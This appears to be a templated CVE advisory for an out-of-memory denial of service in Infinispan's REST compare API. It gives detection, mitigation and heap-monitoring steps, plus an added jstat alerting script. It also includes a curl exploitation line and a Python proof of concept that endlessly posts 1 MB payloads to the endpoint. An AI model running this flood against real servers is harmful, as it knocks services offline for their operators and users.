Infinispan, Denial of Service via REST API, CVE-2025-XXXX (Moderate)

The vulnerability (CVE-2025-XXXX) in Infinispan’s REST Compare API allows an attacker to trigger an Out of Memory (OOM) error by sending repeated large POST requests. The API fails to properly handle buffer allocation and deallocation, leading to memory leaks. When malicious payloads are continuously processed, the system exhausts available memory, causing a denial of service. This affects Infinispan versions up to 15.0.5.Final and development builds like 15.1.0.Dev01.

DailyCVE Form:

Platform: Infinispan
Version: <= 15.0.5.Final
Vulnerability: OOM via REST API
Severity: Moderate
Date: Mar 28, 2025

What Undercode Say:

Exploitation:

curl -X POST http://target:11222/rest/compare -H "Content-Type: application/json" --data @large_payload.json

Repeatedly sending oversized JSON payloads exhausts memory.

Detection:

grep -r "BufferLeak" /var/log/infinispan/

Check logs for memory-related errors.

Mitigation:

  • Limit REST request size:
    <rest-server max-content-length="1048576"/>
  • Upgrade when patches are available.
  • Monitor memory usage:
    jstat -gc <infinispan_pid>

Workaround:

Disable unused REST endpoints:

<rest-server enabled="false"/>

Exploit Code (PoC):

import requests

url = "http://target:11222/rest/compare"
headers = {"Content-Type": "application/json"}
# JSON body of roughly 1 MB (a single long string value)
data = '{"A": "' + "X" * 1000000 + '"}'
while True:
    requests.post(url, headers=headers, data=data)

Protection:

  • Implement rate limiting.
  • Use WAF to block oversized requests.
  • Monitor heap usage with:
    jcmd <pid> GC.heap_info

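To turn the jstat-based heap monitoring above into an alert, the following is an added Python example (not part of the advisory or of the Infinispan project) that parses two `jstat -gc` samples and flags the pattern a leaking request buffer produces before the OOM is thrown: heap near capacity and a burst of full GCs. The column names follow HotSpot's jstat output, and the thresholds are assumptions.

```python
"""Heap-pressure check over `jstat -gc` samples (added example, not from the advisory).
Assumes HotSpot's jstat column names; the header row is parsed, so column order
differences between JDK versions are tolerated."""
from dataclasses import dataclass


@dataclass
class HeapSample:
    used_kb: float       # S0U + S1U + EU + OU
    capacity_kb: float   # S0C + S1C + EC + OC
    full_gc_count: int   # FGC

    @property
    def utilisation(self) -> float:
        return self.used_kb / self.capacity_kb


def parse_jstat_gc(output: str) -> HeapSample:
    """Parse one `jstat -gc <pid>` run: a header line, then one value line.
    Metaspace columns are ignored; the leak described above fills the Java heap."""
    lines = [ln for ln in output.strip().splitlines() if ln.strip()]
    if len(lines) < 2:
        raise ValueError("expected a header line and a value line")
    cols = dict(zip(lines[0].split(), lines[1].split()))
    used = sum(float(cols[c]) for c in ("S0U", "S1U", "EU", "OU"))
    cap = sum(float(cols[c]) for c in ("S0C", "S1C", "EC", "OC"))
    return HeapSample(used, cap, int(cols["FGC"]))


def heap_alert(previous: HeapSample, current: HeapSample,
               util_threshold: float = 0.9, fgc_threshold: int = 3) -> list:
    """Flag sustained heap pressure between two samples: utilisation at or above
    util_threshold and/or at least fgc_threshold full GCs since the last sample."""
    alerts = []
    if current.utilisation >= util_threshold:
        alerts.append(f"heap {current.utilisation:.0%} used")
    fgc_delta = current.full_gc_count - previous.full_gc_count
    if fgc_delta >= fgc_threshold:
        alerts.append(f"{fgc_delta} full GCs since last sample")
    return alerts


# Constructed samples (not real server output): a quiet baseline, then a JVM
# whose old generation is full and which is thrashing in full GC.
BASELINE = """\
 S0C    S1C    S0U    S1U      EC       EU        OC         OU       MC     MU    CCSC   CCSU   YGC     YGCT    FGC    FGCT     GCT
8192.0 8192.0  0.0    512.0  65536.0  12000.0   262144.0   40000.0  40000.0 38000.0 5000.0 4700.0    12    0.150     1    0.080    0.230
"""
PRESSURED = """\
 S0C    S1C    S0U    S1U      EC       EU        OC         OU       MC     MU    CCSC   CCSU   YGC     YGCT    FGC    FGCT     GCT
8192.0 8192.0 8100.0 8050.0  65536.0  65000.0   262144.0  260000.0  40000.0 38000.0 5000.0 4700.0   400    2.900    15    9.500   12.400
"""
```

Run `heap_alert(parse_jstat_gc(BASELINE), parse_jstat_gc(PRESSURED))` on a schedule against live `jstat -gc` output to get an early warning before the server hits OOM.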
References:

Reported By: https://github.com/advisories/GHSA-2q39-w2hw-2pjm